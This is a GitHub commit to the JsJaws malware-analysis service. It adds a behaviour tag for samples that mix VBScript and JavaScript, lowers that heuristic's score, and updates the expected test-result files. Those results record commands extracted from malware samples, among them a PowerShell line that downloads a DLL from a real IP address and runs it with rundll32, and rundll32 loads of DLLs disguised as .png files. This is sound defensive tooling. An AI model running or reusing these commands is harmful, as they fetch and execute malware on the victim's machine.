Skip to content

Commit

Permalink
Merge pull request #575 from CybercentreCanada/update/vbs-tag
Browse files Browse the repository at this point in the history 
Use post-process actions to resubmit to dynamic, not a high score
  • Loading branch information
@cccs-kevin
cccs-kevin committed Aug 16, 2023
2 parents b91a9d0 + 97bd99a commit e717ac0
Show file tree
Hide file tree
Showing 9 changed files with 116 additions and 23 deletions.
1 change: 1 addition & 0 deletions jsjaws.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2024,6 +2024,7 @@ def _is_vb_and_js_scripts(self, scripts: ResultSet[PageElement], request: Servic
if vb_and_js_scripts:
heur = Heuristic(12)
vb_and_js_section = ResultTextSection(heur.name, heuristic=heur, parent=request.result, body=heur.description)
vb_and_js_section.add_tag("file.behavior", heur.name)

# We want to extract all VBScripts IFF there are both JavaScript and VBScript scripts in the file
for script in scripts:
Expand Down
2 changes: 1 addition & 1 deletion service_manifest.yml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -194,7 +194,7 @@ heuristics:

- heur_id: 12
name: Visual Basic and JavaScript
score: 500
score: 1
filetype: '.*'
description: Sample uses a combination of both Visual Basic and JavaScript

Expand Down
19 changes: 16 additions & 3 deletions tests/results/3eadb018d45336f73e6c0f620de84057eb2ffb214f0deb699434aaa01e64a28d/result.json
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -410,6 +416,13 @@
"value": "taskkill /f /im mshta.exe"
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
Expand Down
19 changes: 16 additions & 3 deletions tests/results/6780a74641680b48e143386740bfb8cf380466a75a6c2a09478c8e26dc04ee13/result.json
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1402,
"score": 903,
"sections": [
{
"auto_collapse": false,
Expand Down Expand Up @@ -33,11 +33,17 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {}
},
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand Down Expand Up @@ -405,6 +411,13 @@
"value": "cmd.exe cmd /c start /min powershell IWR -uri http://165.22.160.25/w9edb/160223 -o %temp%\\adeP1F.dll;start-process rundll32 %temp%\\adeP1F.dll N115"
}
],
"file.behavior": [
{
"heur_id": 12,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
Expand Down
19 changes: 16 additions & 3 deletions tests/results/7ed2a67febed6703359258ad597946bd5c07bc4b1313f32b1d82281d09810f9f/result.json
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 871,
"score": 372,
"sections": [
{
"auto_collapse": false,
Expand All @@ -14,11 +14,17 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {}
},
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand Down Expand Up @@ -229,6 +235,13 @@
"signatures": [],
"value": "flasks/data.txt"
}
],
"file.behavior": [
{
"heur_id": 12,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
]
},
"temp_submission_data": {}
Expand Down
22 changes: 18 additions & 4 deletions tests/results/a8b6bac764f3178d130f50949c19f37c5310b23cdc0cba66569e047b732844c4/result.json
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 750,
"score": 251,
"sections": [
{
"auto_collapse": false,
Expand All @@ -14,11 +14,17 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {}
},
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand Down Expand Up @@ -74,7 +80,15 @@
]
}
],
"tags": {},
"tags": {
"file.behavior": [
{
"heur_id": 12,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
]
},
"temp_submission_data": {}
}
}
19 changes: 16 additions & 3 deletions tests/results/b86808fa91902548e429018297f01d9ae76b319fb192fc095e8d40e6aaed71c4/result.json
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -404,6 +410,13 @@
"value": "rundll32 C:\\ProgramData\\index1.png,Wind "
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
Expand Down
19 changes: 16 additions & 3 deletions tests/results/f0a00d22892a3885f4c041e919ee872a3da5d84fe04700e1c3507f22af70ab3d/result.json
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -404,6 +410,13 @@
"value": "rundll32 C:\\ProgramData\\121.png,Wind "
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
Expand Down
19 changes: 16 additions & 3 deletions tests/results/f1b65c29b1d37c4360e92d429613d9b7f3a17bbf34cee8032a5df597685bb358/result.json
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -410,6 +416,13 @@
"value": "taskkill /f /im mshta.exe"
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
Expand Down

0 comments on commit e717ac0

Please sign in to comment.